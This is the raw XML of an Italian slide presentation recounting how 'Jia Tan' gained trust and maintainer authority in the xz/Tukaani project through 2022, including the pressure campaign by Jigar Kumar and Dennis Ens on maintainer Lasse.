                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assieme a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan, Kumar accende una discussione in merito al destino del progetto, nutrendo pessimismo. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan mantiene un atteggiamento collaborativo ed ottimista, rassicurando Kumar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1492BFA0-DA67-53EA-44D7-ED26AD479C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9464" y="1777925"/>
            <a:ext cx="6163320" cy="4426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024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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5764441" cy="46474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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pressioni</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>19 Maggio 2022: Dennis Ens chiede sulla mailing list se ci sia ancora qualcuno a prendersi cura del progetto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lasse ammette le sue difficoltà a seguire il progetto e che l'innovazione del package non è molto attiva al momento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ringrazia inoltre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan (ha già sottoposto 4 patch) per il suo lavoro consistente, aggiungendo che "probabilmente avrà un ruolo importante in futuro".</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50A49A5-5735-A79B-26F9-E01A6A48E4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3594" y="1942361"/>
            <a:ext cx="6096000" cy="3330466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DBBC6B-631F-9963-B67B-3D35ADF200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2113" y="5473147"/>
            <a:ext cx="5752273" cy="1262271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DB7CE18B-D417-56CC-4155-A54D42740131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6100141" y="5176629"/>
            <a:ext cx="100426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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22983194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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5285976" cy="46474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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>27 Maggio 2022: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jigar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kumar aggiunge un messaggio al suo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, mantenendo il suo atteggiamento di "utente non soddisfatto" e ritenendosi "non sorpreso" dello stato del progetto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kumar ed Ens continueranno con pressioni crescenti fino al 29 Giugno 2022. Lasse sarà sempre più accondiscendente, fino ad ammettere problemi personali.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969902DC-03E6-DC80-5FC2-E6DD5DEEC7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8815" y="1940885"/>
            <a:ext cx="6206858" cy="4269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09046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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5764441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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A06B7B02-EB33-E275-6EAE-3BFD917887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9287" y="2417135"/>
            <a:ext cx="4878029" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A235D6-CCC7-0354-7DF7-3B7E19348B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651" y="2887733"/>
            <a:ext cx="6096000" cy="3722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7332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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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802" y="-1112"/>
            <a:ext cx="10522560" cy="1457727"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16016" y="1815057"/>
            <a:ext cx="3756276" cy="249299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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per dare un'idea </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dell'impatto...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comic preso dal caso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kxcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, con cui diversi utenti fanno spesso un paragone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, diagramma, schizzo, disegno&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08DAC98-B24E-1A8B-0A80-2AC73AC5F6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0811" y="1576618"/>
            <a:ext cx="4358087" cy="5166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41838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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5764441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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95864387-7BAF-3A38-0067-B7DC6F262B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767" y="2720849"/>
            <a:ext cx="6096000" cy="3950394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F10F8017-8FB8-D0C5-D3AA-CF8808EEF2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8044" y="1938670"/>
            <a:ext cx="4575959" cy="452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40189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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="5764441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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD5FF744-73AE-AE3F-354E-10656DFC28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2638" y="2417135"/>
            <a:ext cx="5419141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24000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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="6342510" cy="458587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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controllo</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Col tempo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan guadagna non solo fiducia, ma anche autorità:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>27 Settembre 2022: detta la release 5.4.0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28 Ottobre 2022: entra nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tukaani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>organization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su GitHub;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
